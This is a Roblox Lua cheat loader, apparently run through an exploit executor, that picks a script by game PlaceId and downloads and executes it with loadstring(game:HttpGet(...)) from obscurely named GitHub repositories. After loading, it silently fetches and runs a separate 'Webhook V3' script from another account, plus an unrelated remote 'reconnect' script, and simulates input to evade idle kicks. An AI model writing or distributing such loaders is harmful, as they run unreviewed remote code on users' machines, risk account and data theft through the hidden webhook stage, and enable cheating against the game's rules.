--[[ 

███╗   ██╗███████╗██╗  ██╗ █████╗  
████╗  ██║██╔════╝╚██╗██╔╝██╔══██╗ 
██╔██╗ ██║█████╗   ╚███╔╝ ███████║ 
██║╚██╗██║██╔══╝   ██╔██╗ ██╔══██║ 
██║ ╚████║███████╗██╔╝ ██╗██║  ██║ 
╚═╝  ╚═══╝╚══════╝╚═╝  ╚═╝╚═╝  ╚═╝ 

]]

-- Tunggu sampai game siap
repeat task.wait() until game.Players.LocalPlayer and game.Players.LocalPlayer.Character
if not game:IsLoaded() then game.Loaded:Wait() end

print("Supported loader system running...")

local placeId = game.PlaceId

-- Daftar game dan script URL
local games = {
    ["FishIt"] = {
        placeIds = {121864768012064},
        url = "https://raw.githubusercontent.com/fewnbhefbevfhevfdfveh/ckhsuciceifgeufhefveyfg/refs/heads/main/sjfeufeufegfefy"
    },
    ["Prospecting"] = {
        placeIds = {129827112113663},
        url = "https://raw.githubusercontent.com/fewnbhefbevfhevfdfveh/ckhsuciceifgeufhefveyfg/refs/heads/main/ewfheufefgeufg"
    },
    ["PlantVsBrainrot"] = {
        placeIds = {127742093697776},
        url = "https://raw.githubusercontent.com/fewnbhefbevfhevfdfveh/ckhsuciceifgeufhefveyfg/refs/heads/main/wfnwefjwewidjeuf"
    },
    ["99 Nights"] = {
        placeIds = {126509999114328},
        url = "https://raw.githubusercontent.com/fewnbhefbevfhevfdfveh/ckhsuciceifgeufhefveyfg/refs/heads/main/fwfewfefef99%20Nig"
    },
    ["Fisch"] = {
        placeIds = {16732694052, 131716211654599},
        url = "https://raw.githubusercontent.com/fewnbhefbevfhevfdfveh/ckhsuciceifgeufhefveyfg/refs/heads/main/wjdgydfwydwyFISCH"
    }
}

-- Cari script sesuai PlaceId
local scriptUrl
for _, gameInfo in pairs(games) do
    if table.find(gameInfo.placeIds, placeId) then
        scriptUrl = gameInfo.url
        break
    end
end

-- Jalankan script utama
if scriptUrl then
    local success, err = pcall(function()
        loadstring(game:HttpGet(scriptUrl))()
    end)

    if success then
        -- Auto eksekusi Webhook V3
        task.delay(2, function()
            local webhookUrl = "https://raw.githubusercontent.com/hdgsydgdgdy1233/Loaderlua/refs/heads/main/Webhook%20v3"
            pcall(function()
                loadstring(game:HttpGet(webhookUrl))()
            end)
        end)

    else
        warn("Failed to load script:", err)
    end
else
    warn("Unsupported game. PlaceId:", placeId)
end

-- =======================
-- Anti AFK Auto On
-- =======================
local Players = game:GetService("Players")
local VirtualUser = game:GetService("VirtualUser")
local player = Players.LocalPlayer

local AntiAFKEnabled = true
local function doVirtualAction()
    VirtualUser:CaptureController()
    VirtualUser:ClickButton2(Vector2.new(math.random(0,800), math.random(0,600)))
    task.wait(0.05)
    VirtualUser:ClickButton2(Vector2.new(math.random(0,800), math.random(0,600)))
end

player.Idled:Connect(function()
    if AntiAFKEnabled then
        pcall(doVirtualAction)
    end
end)

coroutine.wrap(function()
    while AntiAFKEnabled do
        pcall(doVirtualAction)
        task.wait(math.random(60, 300))
    end
end)()

-- =======================
-- Auto Reconnect
-- =======================
loadstring(game:HttpGet("https://raw.githubusercontent.com/Gato290/Script/refs/heads/main/ha"))()

local TeleportService = game:GetService("TeleportService")
local RunService = game:GetService("RunService")
local placeId = game.PlaceId
local jobId = game.JobId
local RECONNECT_DELAY = 5

local function reconnect()
    print("Mencoba reconnect ke server yang sama...")
    pcall(function()
        TeleportService:TeleportToPlaceInstance(placeId, jobId, player)
    end)
end

player.OnKick = function(reason)
    print("Kicked dari server! Alasan:", tostring(reason))
    task.wait(RECONNECT_DELAY)
    reconnect()
end

RunService.Heartbeat:Connect(function() end)

coroutine.wrap(function()
    while true do
        if not player.Parent then
            print("Player disconnected, mencoba reconnect...")
            task.wait(RECONNECT_DELAY)
            reconnect()
            break
        end
        task.wait(1)
    end
end)()
